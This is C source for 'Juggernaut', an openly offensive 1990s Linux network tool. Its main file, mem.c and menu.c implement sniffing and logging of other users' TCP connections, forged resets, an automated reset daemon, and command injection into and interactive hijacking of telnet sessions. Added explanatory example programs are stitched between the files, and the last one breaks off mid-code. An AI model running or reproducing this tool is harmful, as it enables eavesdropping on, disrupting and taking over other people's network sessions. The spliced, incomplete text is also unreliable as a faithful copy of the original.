#include <sys/types.h>
#include <netinet/in.h>
#ifdef THREAD
#include <pthread.h>
#endif
#define MINIBUF 10
#define BUFSIZE 512
#define DEVICE "eth0"
#define LOGFILE "./juggernaut.log.spy"
char version[]="1.0\0";
int sigsentry=1; /* Signal sentry */
int ripsock=0; /* RIP socket */
int linksock=0; /* SOCK PACKET socket */
int hpid=0; /* hunter child PID */
int acrstpid=0; /* automated connection reset PID */
int netreadtimeout=10; /* Network read timeout in seconds */
int verbosity=1; /* Level of verbosity */
int enticementfactor=16; /* Enticing packets!@ */
time_t uptime=0; /* How long have we been running */
struct connectionInfo{ /* Simple tuple information */
unsigned long saddr; /* Source IP */
unsigned long daddr; /* Destination IP */
unsigned short sport; /* Source TCP Port */
unsigned short dport; /* Destination TCP Port */
};
/*
* Main control logic. All the main logic is implemented in the switch
* statement.
*/
int main(argc,argv)
int argc;
char *argv[];
{
void usage(char *);
void hunt();
void spy();
void rst();
void arst();
void pkta();
void simplexhijack();
void hijack();
void powerup();
void minit();
void mwipe();
void mmain();
void twitch();
void cleanexit();
void bloodhound(char *,int);
void bookworm();
void dbmanip();
void jinfo();
int rawsock();
int tap();
float dump();
char buf[MINIBUF]={0};
char token[2*MINIBUF]={0};
int c;
if(geteuid()||getuid()){ /* r00t? */
fprintf(stderr,"UID or EUID of 0 needed...\n");
exit(0);
}
/* Parse command-line arguments */
while((c=getopt(argc,argv,"s:e:t:vVhH"))!=-1){
switch(c){
case 's': /* dedicated sniffing mode */
strncpy(token,optarg,(sizeof(token)-1));
break;
case 'e': /* Enticement factor (only valid
with -s option) */
enticementfactor=atoi(optarg);
break;
case 't': /* Network alarm timeout */
netreadtimeout=atoi(optarg);
break;
case 'v': /* decrease verbosity */
verbosity=0;
break;
case 'V': /* version info */
jinfo();
exit(0);
case 'h': /* Help is on the way my friend */
usage(argv[0]);
exit(0);
case 'H': /* Help is on the way my friend */
bookworm();
exit(0);
default:
usage(argv[0]);
break;
}
}
if(token[0]){
bloodhound(token,enticementfactor);
exit(0);
}
mwipe();
minit(); /* Initial menu */
fprintf(stderr,"[cr]");
getchar();
signal(SIGINT,twitch); /* Catch these signals */
signal(SIGQUIT,twitch);
ripsock=rawsock(); /* Setup RIP socket */
linksock=tap(DEVICE); /* Setup link socket */
powerup(); /* Setup shared memory and
semaphore */
time(&uptime); /* Start the uptime timer */
hunt(); /* Start the connection hunter */
while(1){
mwipe();
mmain();
bzero(&buf,sizeof(buf));
fgets(buf,sizeof(buf),stdin);
switch(buf[0]){
case '?':
mwipe();
bookworm();
mwipe();
break;
case '0':
mwipe();
jinfo();
mwipe();
break;
case '1':
mwipe();
dbmanip();
mwipe();
break;
case '2': /* Watch a connection. */
mwipe();
spy();
mwipe();
break;
case '3': /* Kill a connection. */
mwipe();
rst();
mwipe();
break;
case '4': /* Automated CRST daemon. */
mwipe();
arst();
mwipe();
break;
case '5': /* Insert a single command. */
mwipe();
simplexhijack();
mwipe();
break;
case '6': /* Hijack the session from the client */
mwipe();
hijack();
mwipe();
break;
case '7': /* The packet assembly workshop */
mwipe();
pkta();
mwipe();
break;
case '8': /* For future use. */
break;
case '9':
cleanexit();
default:
continue;
}
}
/* NOT REACHED */
return(0);
}
/*
* chunt wrapper
*/
void hunt(){
#ifdef MULTI_P
void spasm(); /* Handles the user defined signal */
void chunt();
switch((hpid=fork())){
case 0: /* Child */
signal(SIGUSR1,spasm);
signal(SIGINT,SIG_IGN); /* Catch these signals */
signal(SIGQUIT,SIG_IGN);
close(ripsock); /* Not needed in hunter */
chunt();
default:
break; /* Parent continues */
case -1:
if(verbosity)perror("(hunt) internal forking error [fatal]");
exit(1);
}
#endif
#ifdef THREAD
MULTIPLE THREADS OF EXECUTION IS NOT IMPLEMENTED YET.
void chunt();
pthread_t hunter_t;
pthread_create(&hunter_t,NULL,(void *)chunt(),(void *)NULL);
#endif
}
/*
* cspy wrapper
*/
void spy(){
void convulsion();
float dump();
struct connectionInfo *checkc(int);
void cspy(struct connectionInfo *,FILE *);
char buf[MINIBUF];
unsigned short val;
struct connectionInfo *target;
FILE *fp=0;
dump();
while(1){
fprintf(stderr,"\nChoose a connection [q] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]==0x0a||buf[0]=='q')return;
if(!(int)(val=atoi(buf)))continue;
if(!(target=checkc(val)))fprintf(stderr,"Connection not in queue.\n");
else break;
}
fprintf(stderr,"\nDo you wish to log to a file as well? [y/N] >");
fgets(buf,sizeof(buf),stdin);
if(toupper(buf[0])=='Y'){
if(!(fp=fopen(LOGFILE,"a+"))){
if(verbosity){
fprintf(stderr,"Cannot open file for logging, skipping operation.\n");
fprintf(stderr,"[cr]");
getchar();
}
}
}
fprintf(stderr,"\nSpying on connection, hit `ctrl-c` when done.\n");
signal(SIGINT,convulsion);
sigsentry=1;
cspy(target,fp);
if(fp)fclose(fp);
}
/*
* crst wrapper
*/
void rst(){
void convulsion();
float dump();
void crst(struct connectionInfo *);
struct connectionInfo *checkc(int);
char buf[MINIBUF];
unsigned short val;
struct connectionInfo *target;
dump();
while(1){
fprintf(stderr,"\nChoose a connection [q] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]==0x0a||buf[0]=='q')return;
if(!(int)(val=atoi(buf)))continue;
if(!(target=checkc(val)))fprintf(stderr,"Connection not in queue.\n");
else break;
}
signal(SIGINT,convulsion);
crst(target);
fprintf(stderr,"[cr]");
getchar();
}
/*
* acrst wrapper
*/
void arst(){
void convulsion();
float dump();
void acrst(unsigned long,unsigned long);
char *hostLookup(unsigned long);
unsigned long nameResolve(char *);
char buf[4*MINIBUF];
unsigned long source,target;
/* Setup addressing info */
fprintf(stderr,"\nEnter source IP [q] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]==0x0a||buf[0]=='q')return;
if(!(source=nameResolve(buf))){
if(verbosity){
fprintf(stderr,"Name lookup failure: `%s`\n[cr]",buf);
getchar();
}
return;
}
fprintf(stderr,"\nEnter target IP (optional) [q] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]=='q')return;
if(buf[0]==0x0a)target=0; /* target may be null, in this
case, we only care where
the connection is coming from */
else if(!(target=nameResolve(buf))){
if(verbosity){
fprintf(stderr,"Name lookup failure: %s\n[cr]",buf);
getchar();
}
return;
}
if(!target)fprintf(stderr,"Resetting all connection requests from:\t %s\n",hostLookup(source));
else fprintf(stderr,"Resetting all connection requests from:\t %s --> %s\n",hostLookup(source),hostLookup(target));
fprintf(stderr,"[cr]");
getchar();
acrst(source,target);
}
/*
* dumpc wrapper
*/
float dump(){
float dumpc();
float usage=0;
fprintf(stderr,"\nCurrent Connection Database:\n");
fprintf(stderr,"-------------------------------------------------\n");
fprintf(stderr,"ref # source target \n\n");
usage=dumpc();
fprintf(stderr,"-------------------------------------------------\n");
return usage;
}
/*
* database manipulation routines go here..
*/
void dbmanip(){
float dump();
void cleardb();
float usage=0;
char buf[MINIBUF];
usage=dump();
if(usage)fprintf(stderr,"\nDatabase is %.02f%% to capacity.",usage);
else fprintf(stderr,"\nDatabase is empty.");
fprintf(stderr,"\n[c,q] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]=='c'){
fprintf(stderr,"\nClear entire connection database? [y/N] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]=='y'){
cleardb();
fprintf(stderr,"\nConnection database cleared.\n[cr]");
getchar();
}
}
}
/*
* Juggernaut version and option information
*/
void jinfo(){
time_t current=0;
fprintf(stderr,"Juggernaut %s route@infonexus.com [guild 1996/7]\n",version);
fprintf(stderr,"\nJuggernaut compiled with the following options:\n");
#ifdef MULTI_P
fprintf(stderr," Multi-processing\n");
#endif
#ifdef NOHUSH
fprintf(stderr," Audible notification\n");
#endif
#ifdef USENAME
fprintf(stderr," Use hostnames\n");
#endif
#ifdef GREED
fprintf(stderr," Greedy connections\n");
#endif
#ifdef FASTCHECK
fprintf(stderr," Fast IP checksumming\n");
#endif
#ifdef IP_HDRINCL
fprintf(stderr," IP header include\n");
#endif
#ifdef THREAD
fprintf(stderr," Multi-threading\n");
#endif
time(&current);
fprintf(stderr,"Juggernaut has been running %.02f minutes\n",(difftime(current,uptime)/60));
fprintf(stderr,"[cr]");
getchar();
}
/*
* csimplexhijack wrapper
*/
void simplexhijack(){
void sputter();
float dump();
void csimplexhijack(struct connectionInfo *,char *);
void cspy(struct connectionInfo *,FILE *);
struct connectionInfo *checkc(int);
char buf[MINIBUF];
char commandbuf[BUFSIZE];
unsigned short val;
struct connectionInfo *target;
dump();
while(1){
fprintf(stderr,"\nChoose a connection [q] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]==0x0a||buf[0]=='q')return;
if(!(int)(val=atoi(buf)))continue;
if(!(target=checkc(val)))fprintf(stderr,"Connection not in queue.\n");
else break;
}
if(ntohs(target->dport)!=23){
fprintf(stderr,"Hijacking only valid with telnet connections.\n");
fprintf(stderr,"[cr]");
getchar();
return;
}
fprintf(stderr,"Enter the command string you wish executed [q] >");
fgets(commandbuf,sizeof(commandbuf),stdin);
if(commandbuf[0]==0x0a)return;
fprintf(stderr,"\nSpying on connection, hit `ctrl-c` when you want to hijack.\n");
fprintf(stderr,"\nNOTE: This may cause an ACK storm until client is RST.\n");
signal(SIGINT,sputter);
sigsentry=1;
cspy(target,0);
csimplexhijack(target,commandbuf);
fprintf(stderr,"[cr]");
getchar();
}
/*
* chijack wrapper
*/
void hijack(){
void sputter();
float dump();
void chijack(struct connectionInfo *);
void cspy(struct connectionInfo *,FILE *);
struct connectionInfo *checkc(int);
char buf[MINIBUF];
unsigned short val;
struct connectionInfo *target;
dump();
while(1){
fprintf(stderr,"\nChoose a connection [q] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]==0x0a||buf[0]=='q')return;
if(!(int)(val=atoi(buf)))continue;
if(!(target=checkc(val)))fprintf(stderr,"Connection not in queue.\n");
else break;
}
if(ntohs(target->dport)!=23){
fprintf(stderr,"Hijacking only valid with telnet connections.\n");
fprintf(stderr,"[cr]");
getchar();
return;
}
fprintf(stderr,"\nSpying on connection, hit `ctrl-c` when you want to hijack.\n");
fprintf(stderr,"\nNOTE: This will cause an ACK storm and desynch the client until the connection is RST.\n");
signal(SIGINT,sputter);
sigsentry=1;
cspy(target,0);
sigsentry=1;
chijack(target);
fprintf(stderr,"[cr]");
getchar();
}
/*
* Prometheus wrapper (packet assembly workshop)
*/
void pkta(){
void mpkta();
void mwipe();
int prometheus(int);
int val,mode;
char buf[MINIBUF];
while(1){
mwipe();
mpkta();
fgets(buf,sizeof(buf),stdin);
if(!(val=atoi(buf)))continue;
switch(val){
case 1: /* TCP */
mode=1;
break;
case 2: /* UDP */
mode=2;
break;
case 3: /* ICMP */
mode=3;
break;
case 4: /* IP */
mode=4;
break;
case 5: /* Return */
return;
default:
continue;
}
if(prometheus(mode))break;
}
/* NOT REACHED */
}
<-->
<++> Juggernaut/NumberOneCrush/mem.c
/*
*
* Juggernaut
* Version b1
*
* 1996/7 Guild productions
* daemon9[guild|phrack|r00t]
*
* comments to route@infonexus.com
*
* This coding project made possible by a grant from the Guild corporation
*
* mem.c - contains shared memory and semaphore control logic
*
* Multi-process:
* Initializing and accessing shared memory:
* ----------------------------------------
* - Create the shared segment
* - Attach each process to the segment (in our case, the hunter child
* process will inherit a pointer to the block)
* - Grab a semaphore
* - Lock the semaphore; Manipulate shared segment; unlock the semaphore
*
*
* Multi-threaded:
*/
/* Header names were lost in transcription; reconstructed from what mem.c
   uses (SysV shm/sem, bzero/memcpy, ntohs and the Linux packet headers). */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/shm.h>
#include <sys/sem.h>
#include <netinet/in.h>
#include <linux/if_ether.h>
#include <linux/ip.h>
#include <linux/tcp.h>
#define SHMKEY 242 /* Shared memory key */
#define SEMKEY 424 /* Semaphore key */
#define PERMS 0666 /* Shared Memory Permissions */
#define MAXNODES 512 /* Maximum number of nodes */
#define ADDMSG "+"
#define DELMSG "-"
int semid; /* Semaphore ID */
struct sembuf lock[2]={{0,0,0},{0,1,SEM_UNDO}};
/* wait for sem#0 to become 0 then
increment sem#0 by 1 */
struct sembuf ulock[1]={{0,-1,(IPC_NOWAIT|SEM_UNDO)}};
/* decrement sem#0 by 1 (sets it to 0) */
struct epack{ /* Generic Ethernet packet w/o data payload */
struct ethhdr eth; /* Ethernet Header */
struct iphdr ip; /* IP header */
struct tcphdr tcp; /* TCP header */
char payload[8192]; /* Data Payload */
}epack;
static struct connectionInfo{ /* Simple tuple structure */
unsigned long saddr; /* Source IP */
unsigned long daddr; /* Destination IP */
unsigned short sport; /* Source TCP Port */
unsigned short dport; /* Destination TCP Port */
}*cinfo=0;
extern int verbosity;
/*
* Creates the shared memory segment then attaches it; then creates a binary
* semaphore to guarantee exclusive access. Clears the structure array.
* Dumps some info.
* Much credit to Richard Stevens and Jeff Thompson.
*/
void powerup(){
void locks();
void ulocks();
void cleardb();
int shmid; /* Shared memory segment id */
int len;
len=sizeof(struct connectionInfo)*MAXNODES;
/* Request a shared memory segment */
if((shmid=shmget(SHMKEY,len,IPC_CREAT|PERMS))<0){ /* PERMS was missing here; without it the segment is created mode 0 and only root can attach */
if(verbosity)perror("(powerup) shared memory segment allocation error [fatal]");
exit(1);
}
/* Get one semaphore to perform shared
memory locking with */
if((semid=semget(SEMKEY,1,IPC_CREAT|PERMS))<0){
if(verbosity)perror("(powerup) semaphore allocation error [fatal]");
exit(1);
}
/* Attach to the shared memory segment */
cinfo=(struct connectionInfo *)shmat(shmid,0,0);
cleardb();
}
/*
* Release the shared memory segment.
*/
void powerdown(){
void locks();
void ulocks();
locks();
shmdt((char *)cinfo); /* Detach the segment. Note: the segment and semaphore are not removed (no IPC_RMID), so they outlive the process */
ulocks();
}
/*
* Locks the semaphore so the caller can access the shared memory segment.
* This is an atomic operation.
*/
void locks(){
if(semop(semid,&lock[0],2)<0){
if(verbosity)perror("(locks) could not lock semaphore [fatal]");
exit(1);
}
}
/*
* Unlocks the semaphore so the caller can access the shared memory segment.
* This is an atomic operation.
*/
void ulocks(){
if(semop(semid,&ulock[0],1)<0){
if(verbosity)perror("(ulocks) could not unlock semaphore [fatal]");
exit(1);
}
}
/*
* Add a connection to our list. Linear search of the WHOLE list to see if
* it's already there (which IT SHOULDN'T BE...), if not, add it in the
* first open slot.
*/
char *addc(iphp,tcphp)
struct iphdr *iphp;
struct tcphdr *tcphp;
{
void locks();
void ulocks();
int i=0;
/* A wonderfully inefficient linear
search for duplicates */
locks(); /* Lock shared memory segment */
for(;i<MAXNODES;i++)if(iphp->saddr==cinfo[i].saddr&&iphp->daddr==cinfo[i].daddr&&tcphp->source==cinfo[i].sport&&tcphp->dest==cinfo[i].dport){
ulocks();
return(0); /* Oops. Found a duplicate */
}
/* Find available slot */
for(i=0;i<MAXNODES;i++){
if(!cinfo[i].saddr){
cinfo[i].saddr=iphp->saddr;
cinfo[i].daddr=iphp->daddr;
cinfo[i].sport=tcphp->source;
cinfo[i].dport=tcphp->dest;
ulocks();
return(ADDMSG);
}
} /* Control falls here if array is
full (which is indicative of
a BUSY NETWORK!@*/
ulocks();
return(0);
}
/*
* Remove a connection from our list. Linear search until we find a
* corresponding entry, or we hit the end of the list.
*/
char *delc(iphp,tcphp)
struct iphdr *iphp;
struct tcphdr *tcphp;
{
void locks();
void ulocks();
int i=0;
locks(); /* Lock shared memory segment */
for(;i<MAXNODES;i++)if(iphp->saddr==cinfo[i].saddr&&iphp->daddr==cinfo[i].daddr&&tcphp->source==cinfo[i].sport&&tcphp->dest==cinfo[i].dport){
bzero(&cinfo[i],sizeof(cinfo[i]));
ulocks();
return(DELMSG); /* Inform caller of success */
}
ulocks();
return(0); /* hmm. Weird. */
}
/*
* Dump the connection list.
*/
float dumpc()
{
void locks();
void ulocks();
char *hostLookup(unsigned long);
int i=0;
float j=0;
locks();
for(;i<MAXNODES;i++)if(cinfo[i].saddr){ /* format string below reconstructed from the surviving tail */
fprintf(stderr,"%d)\t %s [%d]\t-->\t %s [%d]\n",i+1,hostLookup(cinfo[i].saddr),ntohs(cinfo[i].sport),hostLookup(cinfo[i].daddr),ntohs(cinfo[i].dport));
j++;
}
ulocks();
if(!j)return(0);
return(((j/MAXNODES)*100)); /* % utilization */
}
/*
* Check for a connection by index number. Really only here to make sure the
* connection hasn't been deleted since dump() was called.... I think I
* will deprecate this function in future versions...
*/
struct connectionInfo *checkc(target)
int target;
{
void locks();
void ulocks();
static struct connectionInfo tmp;
locks(); /* Lock shared memory segment */
if(cinfo[--target].saddr){
memcpy(&tmp,&cinfo[target],sizeof(tmp));
ulocks();
return(&tmp);
}
ulocks(); /* Nope. Not there */
return((struct connectionInfo *)0);
}
/*
* Clear the connection database
*/
void cleardb(){
void locks();
void ulocks();
int i=0;
locks();
for(;i<MAXNODES;i++)bzero(&cinfo[i],sizeof(cinfo[i]));
ulocks();
}
<-->
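An added example, not part of Juggernaut, showing the pattern the mem.c header describes (create the segment, attach, take the semaphore, manipulate, release) with a forked child and the parent inserting into one connection table at the same time. It departs from mem.c in two places a practitioner should care about: it uses IPC_PRIVATE rather than the fixed keys SHMKEY/SEMKEY, so two copies on one host cannot attach to the same segment (a second Juggernaut started on the same box attaches to the first one's database and wipes it in powerup() via cleardb()), and it removes the segment and semaphore on teardown, where powerdown() only detaches. All names (condb_*, MAXNODES of 64, the 10.0.0.x tuples) are this example's own.

```c
/* Added example, not Juggernaut's code: the locked shared-memory connection
 * database mem.c describes, exercised by a parent and a forked child at once. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/shm.h>
#include <sys/sem.h>
#include <sys/wait.h>

#define MAXNODES 64

struct tuple { unsigned long saddr, daddr; unsigned short sport, dport; };
struct condb { int shmid, semid; struct tuple *slots; };   /* slots: MAXNODES entries in shared memory */
union semun { int val; struct semid_ds *buf; unsigned short *array; };  /* caller must define this, see semctl(2) */

/* Same two-step lock as mem.c: wait for sem#0 to be 0, then raise it to 1, as
 * one atomic semop; SEM_UNDO releases it if the holder dies mid-update. */
static struct sembuf lock_ops[2]  = {{0, 0, 0}, {0, 1, SEM_UNDO}};
static struct sembuf ulock_ops[1] = {{0, -1, IPC_NOWAIT | SEM_UNDO}};

static void locks(struct condb *db)  { if (semop(db->semid, lock_ops, 2) < 0)  { perror("semop lock");   exit(1); } }
static void ulocks(struct condb *db) { if (semop(db->semid, ulock_ops, 1) < 0) { perror("semop unlock"); exit(1); } }

int condb_create(struct condb *db)
{
    union semun arg;
    size_t len = sizeof(struct tuple) * MAXNODES;
    /* IPC_PRIVATE: a fresh segment and semaphore each run, so two instances on
     * one host cannot collide the way fixed keys (SHMKEY 242, SEMKEY 424) can. */
    if ((db->shmid = shmget(IPC_PRIVATE, len, IPC_CREAT | 0600)) < 0) return -1;
    if ((db->semid = semget(IPC_PRIVATE, 1, IPC_CREAT | 0600)) < 0) return -1;
    arg.val = 0;
    if (semctl(db->semid, 0, SETVAL, arg) < 0) return -1;   /* don't rely on the kernel zeroing it */
    if ((db->slots = shmat(db->shmid, NULL, 0)) == (void *)-1) return -1;
    memset(db->slots, 0, len);
    return 0;
}

/* Detach and remove; mem.c's powerdown() only detaches, leaving both objects behind. */
void condb_destroy(struct condb *db)
{
    shmdt(db->slots);
    shmctl(db->shmid, IPC_RMID, NULL);
    semctl(db->semid, 0, IPC_RMID);
}

static int same(const struct tuple *a, const struct tuple *b)
{
    return a->saddr == b->saddr && a->daddr == b->daddr && a->sport == b->sport && a->dport == b->dport;
}

/* 1 added, 0 already present, -1 table full. The duplicate scan and the insert
 * sit under one lock; otherwise two processes can both "find no duplicate". */
int condb_add(struct condb *db, const struct tuple *t)
{
    int i, rc = -1;
    locks(db);
    for (i = 0; i < MAXNODES; i++) if (db->slots[i].saddr && same(&db->slots[i], t)) { rc = 0; goto out; }
    for (i = 0; i < MAXNODES; i++) if (!db->slots[i].saddr) { db->slots[i] = *t; rc = 1; break; }
out:
    ulocks(db);
    return rc;
}

int condb_del(struct condb *db, const struct tuple *t)
{
    int i, rc = 0;
    locks(db);
    for (i = 0; i < MAXNODES; i++)
        if (db->slots[i].saddr && same(&db->slots[i], t)) { memset(&db->slots[i], 0, sizeof db->slots[i]); rc = 1; break; }
    ulocks(db);
    return rc;
}

int condb_count(struct condb *db)
{
    int i, n = 0;
    locks(db);
    for (i = 0; i < MAXNODES; i++) if (db->slots[i].saddr) n++;
    ulocks(db);
    return n;
}

/* Parent and child each insert 20 shared tuples plus 10 of their own; the lock
 * guarantees exactly 40 distinct entries whatever the interleaving. */
int condb_demo(void)
{
    struct condb db;
    struct tuple t;
    pid_t pid;
    int i, count;

    if (condb_create(&db) < 0) return -1;
    if ((pid = fork()) < 0) { condb_destroy(&db); return -1; }
    for (i = 0; i < 30; i++) {
        t.saddr = 0x0a000001UL + (unsigned long)(i < 20 ? i : i + (pid ? 100 : 200));  /* constructed 10.0.x.x */
        t.daddr = 0x0a000002UL;
        t.sport = (unsigned short)(1024 + i);
        t.dport = 23;
        condb_add(&db, &t);
    }
    if (pid == 0) { shmdt(db.slots); _exit(0); }   /* child: detach only, never IPC_RMID */
    waitpid(pid, NULL, 0);
    count = condb_count(&db);
    condb_destroy(&db);
    return count;
}

int main(void)
{
    printf("distinct connections after concurrent inserts: %d\n", condb_demo());
    return 0;
}
```

ipcs(1) lists whatever a crashed run left behind; with fixed keys the next run attaches to the leftover segment instead of a fresh one, which is the reason this example prefers IPC_PRIVATE and explicit removal.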
<++> Juggernaut/NumberOneCrush/menu.c
/*
*
* Juggernaut
* Version b2
*
* 1996/7 Guild productions
* daemon9[guild|phrack|r00t]
*
* comments to route@infonexus.com
*
* This coding project made possible by a grant from the Guild corporation
*
* menu.c - menu functions.
*
*/
#include <stdio.h>
extern char version[];
/*
* Initial Screen
*/
void minit(){
printf("\t\t\t J U G G E R N A U T\n");
printf("\t\t multipurpose network tool for Linux\n");
printf("\t\t\t version: %s\n",version);
printf("\n\n\n\n\n\n");
printf("\t (c) 1996/7 daemon9 | A Guild Corporation Production\t\t\t\n");
printf("\n\n\n\n\n\n");
}
/*
* Main Menu
*/
void mmain(){
printf("\t\t\t Juggernaut\n");
printf("\t\t\t+------------------------------+\n");
printf("\t\t\t?) Help\n");
printf("\t\t\t0) Program information\n");
printf("\t\t\t1) Connection database\n");
printf("\t\t\t2) Spy on a connection\n");
printf("\t\t\t3) Reset a connection\n");
printf("\t\t\t4) Automated connection reset daemon\n");
printf("\t\t\t5) Simplex connection hijack\n");
printf("\t\t\t6) Interactive connection hijack\n");
printf("\t\t\t7) Packet assembly module\n");
printf("\t\t\t8) Souper sekret option number eight\n");
printf("\t\t\t9) Step Down\n");
printf("\n\n\n\n\n\n\n\n\n");
printf(">");
}
/*
* Packet Assembly Menu [prometheus module]
*/
void mpkta(){
printf("\t\t\t Packet Assembly Module (beta)\n");
printf("\t\t\t+------------------------------+\n");
printf("\t\t\t1. TCP Assembler\n");
printf("\t\t\t2. UDP Assembler\n");
printf("\t\t\t3. ICMP Assembler\n");
printf("\t\t\t4. IP Assembler\n");
printf("\t\t\t5. Return to previous menu\n");
printf("\n\n\n\n\n\n\n\n\n\n");
printf(">");
}
/*
* TCP assembly options menu
*/
void mpktatcp(packetready,source,destination,seqnum,acknum,control,window,data)
int packetready;
unsigned short source;
unsigned short destination;
unsigned long seqnum;
unsigned long acknum;
char *control;
unsigned short window;
char data[512];
{
printf("\t\t\t TCP Packet Assembly\n");
printf("\t\t\t+------------------------------+\n");
if(!(packetready&0x01))printf("\t\t\t1. Source port\n");
else printf("\t\t\tSource port: %d\n",source);
if(!(packetready&0x02))printf("\t\t\t2. Destination port\n");
else printf("\t\t\tDestination port: %d\n",destination);
if(!(packetready&0x04))printf("\t\t\t3. Sequence Number\n");
else printf("\t\t\tSequence Number: %ld\n",seqnum);
if(!(packetready&0x08))printf("\t\t\t4. Acknowledgement Number\n");
else printf("\t\t\tAcknowledgement Number: %ld\n",acknum);
if(!(packetready&0x10))printf("\t\t\t5. Control Bits\n");
else printf("\t\t\tControl Flags: %s\n",control);
if(!(packetready&0x20))printf("\t\t\t6. Window Size\n");
else printf("\t\t\tWindow Size: %d\n",window);
if(!(packetready&0x40))printf("\t\t\t7. Data Payload\n");
else printf("\t\t\tData payload: %s\n",data);
printf("\t\t\t8. Return to previous menu\n");
printf("\t\t\t9. Return to main menu\n");
if(packetready==0x7F)printf("\t\t\t10. Pass packet to RIP assembler\n");
printf("\n\n\n\n\n\n\n\n\n\n");
printf(">");
}
/*
* UDP assembly options menu
*/
void mpktaudp(packetready,source,destination,data)
int packetready;
unsigned short source;
unsigned short destination;
char data[512];
{
printf("\t\t\t UDP Packet Assembly\n");
printf("\t\t\t+------------------------------+\n");
if(!(packetready&0x01))printf("\t\t\t1. Source port\n");
else printf("\t\t\tSource port: %d\n",source);
if(!(packetready&0x02))printf("\t\t\t2. Destination port\n");
else printf("\t\t\tDestination port: %d\n",destination);
if(!(packetready&0x04))printf("\t\t\t3. Data payload\n");
else printf("\t\t\tData payload: %s\n",data);
printf("\t\t\t4. Return to previous menu\n");
printf("\t\t\t5. Return to main menu\n");
if(packetready==0x7)printf("\t\t\t6. Pass packet to RIP assembler\n");
printf("\n\n\n\n\n\n\n\n\n\n");
printf(">");
}
/*
* ICMP assembly options menu
*/
void mpktaicmp(packetready,type,code,data)
int packetready;
unsigned short type;
unsigned short code;
char data[512];
{
printf("\t\t\t ICMP Packet Assembly\n");
printf("\t\t\t+------------------------------+\n");
if(!(packetready&0x01))printf("\t\t\t1. Type\n");
else printf("\t\t\tType: %d\n",type);
if(!(packetready&0x02))printf("\t\t\t2. Code\n");
else printf("\t\t\tCode: %d\n",code);
if(!(packetready&0x04))printf("\t\t\t3. Data payload\n");
else printf("\t\t\tData payload: %s\n",data);
printf("\t\t\t4. Return to previous menu\n");
printf("\t\t\t5. Return to main menu\n");
if(packetready==0x07)printf("\t\t\t6. Pass packet to RIP assembler\n");
printf("\n\n\n\n\n\n\n\n\n\n");
printf(">");
}
/*
* IP assembly options menu
*/
void mpktaip(packetready,tos,fflags,fo,ttl,saddr,daddr,number,packettype)
int packetready;
char *tos;
char *fflags;
unsigned short fo;
unsigned short ttl;
char *saddr;
char *daddr;
int number;
char *packettype;
{
printf("\t\t\t IP Packet Assembly\n");
printf("\t\t\t+------------------------------+\n");
if(!(packetready&0x01))printf("\t\t\t1. TOS\n");
else printf("\t\t\tTOS: %s\n",tos);
if(!(packetready&0x02))printf("\t\t\t2. Fragment Flags\n");
else printf("\t\t\tFragment flags: %s\n",fflags);
if(!(packetready&0x04))printf("\t\t\t3. Fragment Offset\n");
else printf("\t\t\tFragment offset: %d\n",(fo&0x1fff));
if(!(packetready&0x08))printf("\t\t\t4. TTL\n");
else printf("\t\t\tTTL: %d\n",ttl);
if(!(packetready&0x10))printf("\t\t\t5. Source Address\n");
else printf("\t\t\tSource Address: %s\n",saddr);
if(!(packetready&0x20))printf("\t\t\t6. Destination Address\n");
else printf("\t\t\tDestination Address: %s\n",daddr);
if(!(packetready&0x40))printf("\t\t\t7. Number of packets to send\n");
else printf("\t\t\tSending %d packet(s)\n",number);
printf("\t\t\t8. Return to previous menu\n");
printf("\t\t\t9. Return to main menu\n");
if(packetready==0x7f)printf("\t\t\t10. Transmit %s packet(s)\n",packettype);
printf("\n\n\n\n\n\n\n\n\n\n");
printf(">");
}
/*
* Clear the Screen
*/
void mwipe(){
printf("\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n");
}
<-->
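Before net.c: an added example, not Juggernaut's code, that applies the hunter rule implemented by chunt(), add() and del() below (a SYN without ACK opens an entry, a FIN or RST closes it) to a constructed sequence of Ethernet/IP/TCP frames. It goes beyond the original in two ways. The headers are read from the byte buffer by offset, so the compiler padding that ALIGNNETPOINTERS compensates for with its -2 cannot bite; eth_ip_padding() measures that padding on the host. And a FIN or RST is matched in either direction, whereas delc() as written compares the tuple only in the orientation the SYN was recorded in, so a server-side RST never clears the entry. Every identifier, the 10.0.0.1/10.0.0.2 frames and the MAXNODES of 16 are constructed for the example.

```c
/* Added example, not Juggernaut's code: chunt()'s bookkeeping rule run over
 * constructed frames, parsing headers by byte offset rather than cast pointers. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define MAXNODES 16
#define ETHHDR 14
#define IPHDR 20
#define TCPHDR 20

struct tuple { uint32_t saddr, daddr; uint16_t sport, dport; };
static struct tuple table[MAXNODES];

/* Plain, unpacked mirrors of the wire headers, used only to measure the
 * padding the compiler inserts after a 14-byte Ethernet header. */
struct eth_   { uint8_t dst[6], src[6]; uint16_t proto; };
struct ip_    { uint8_t vhl, tos; uint16_t len, id, frag; uint8_t ttl, proto; uint16_t check; uint32_t saddr, daddr; };
struct epack_ { struct eth_ eth; struct ip_ ip; };

/* 2 on the usual ABIs: epack.ip starts at offset 16 while the wire puts the IP
 * header at 14, which is why net.c's macro backs its pointers up by 2. */
size_t eth_ip_padding(void) { return offsetof(struct epack_, ip) - ETHHDR; }

static uint16_t rd16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }
static uint32_t rd32(const uint8_t *p) { return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) | ((uint32_t)p[2] << 8) | p[3]; }
static void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)(v >> 8); p[1] = (uint8_t)v; }
static void wr32(uint8_t *p, uint32_t v) { p[0] = (uint8_t)(v >> 24); p[1] = (uint8_t)(v >> 16); p[2] = (uint8_t)(v >> 8); p[3] = (uint8_t)v; }

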